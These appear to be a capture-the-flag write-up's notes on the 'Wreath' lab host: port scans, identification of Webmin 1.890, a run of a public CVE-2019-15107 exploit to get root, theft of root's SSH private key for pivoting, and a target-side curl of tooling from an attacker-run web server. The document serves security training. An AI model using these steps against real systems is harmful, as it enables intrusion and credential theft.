rustscan -a 10.200.125.200
PORT STATE SERVICE REASON
22/tcp open ssh syn-ack
80/tcp open http syn-ack
443/tcp open https syn-ack
10000/tcp open snet-sensor-mgmt syn-ack
nmap -sC -sV 10.200.125.200 -p 22,80,443,10000
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.0 (protocol 2.0)
| ssh-hostkey:
| 3072 9c:1b:d4:b4:05:4d:88:99:ce:09:1f:c1:15:6a:d4:7e (RSA)
| 256 93:55:b4:d9:8b:70:ae:8e:95:0d:c2:b6:d2:03:89:a4 (ECDSA)
|_ 256 f0:61:5a:55:34:9b:b7:b8:3a:46:ca:7d:9f:dc:fa:12 (ED25519)
80/tcp open http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_http-title: Did not follow redirect to <https://thomaswreath.thm>
443/tcp open ssl/http Apache httpd 2.4.37 ((centos) OpenSSL/1.1.1c)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.37 (centos) OpenSSL/1.1.1c
|_http-title: Thomas Wreath | Developer
| ssl-cert: Subject: commonName=thomaswreath.thm/organizationName=Thomas Wreath Development/stateOrProvinceName=East Riding Yorkshire/countryName=GB
| Not valid before: 2022-02-08T11:28:40
|_Not valid after: 2023-02-08T11:28:40
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
10000/tcp open http MiniServ 1.890 (Webmin httpd)
|_http-server-header: MiniServ/1.890
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
We have to add the following line to /etc/hosts because the DNS is not set
10.200.125.200 thomaswreath.thm
Getting to find CVE-2019-15107 by typing MiniServ 1.890 (Webmin httpd) on Google
https://github.com/MuirlandOracle/CVE-2019-15107
python3 CVE-2019-15107.py 10.200.125.200
After running the Python script we can get to the root user
Then we go to /root/.ssh/id_rsa to get the private ssh key, and chmod 600 it to do pivot later
id_rsa_privDownload the static nmap binary from
Setup your own python server at the attacking machine
sudo python3 -m http.server 80
Then use the target machine curl our nmap static binary from our local machine